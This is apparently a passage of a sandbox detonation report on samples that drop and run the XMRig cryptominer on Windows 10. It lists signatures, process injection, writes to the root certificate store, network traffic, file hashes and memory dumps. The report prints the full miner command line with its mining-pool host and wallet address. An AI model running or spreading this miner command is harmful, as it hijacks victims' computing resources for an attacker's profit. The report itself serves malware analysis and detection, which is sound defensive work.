memory/3204-32-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-33-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-34-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-35-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-36-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-37-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-38-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-39-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-40-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-41-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-42-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-43-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-44-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-45-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-46-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-47-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-48-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-49-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-50-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-51-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-52-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-53-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-54-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-55-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-56-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-57-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-58-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-59-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-60-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-61-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-62-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-63-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-64-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-65-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-66-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-67-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-68-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-69-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-70-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-71-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-72-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-73-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-74-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-75-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-76-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-77-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-78-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-79-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-80-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-81-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-82-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-83-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-84-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2140 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2140 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.73.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2360-16-0x0000021688950000-0x0000021688970000-memory.dmp
memory/2360-17-0x000002168A160000-0x000002168A180000-memory.dmp
memory/2360-18-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-19-0x000002168A180000-0x000002168A1A0000-memory.dmp
memory/2360-20-0x000002168A1A0000-0x000002168A1C0000-memory.dmp
memory/2360-21-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-22-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-25-0x000002168A1A0000-0x000002168A1C0000-memory.dmp
memory/2360-24-0x000002168A180000-0x000002168A1A0000-memory.dmp
memory/2360-23-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-26-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-27-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-28-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-29-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-30-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-31-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-32-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-33-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-34-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-35-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-36-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-37-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-38-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-39-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-40-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-41-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-42-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-43-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-44-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-45-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-46-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-47-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-48-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-49-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-50-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-51-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-52-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-53-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-54-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-55-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-56-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-57-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-58-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-59-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-60-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-61-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-62-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-63-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-64-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-65-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-66-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-67-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-68-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-69-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-70-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-71-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-72-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-73-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-74-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-75-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-76-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-77-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-78-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-79-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-80-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-81-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-82-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-83-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-84-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 656 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 656 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.17.178.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1844-16-0x000001FDBCBB0000-0x000001FDBCBD0000-memory.dmp
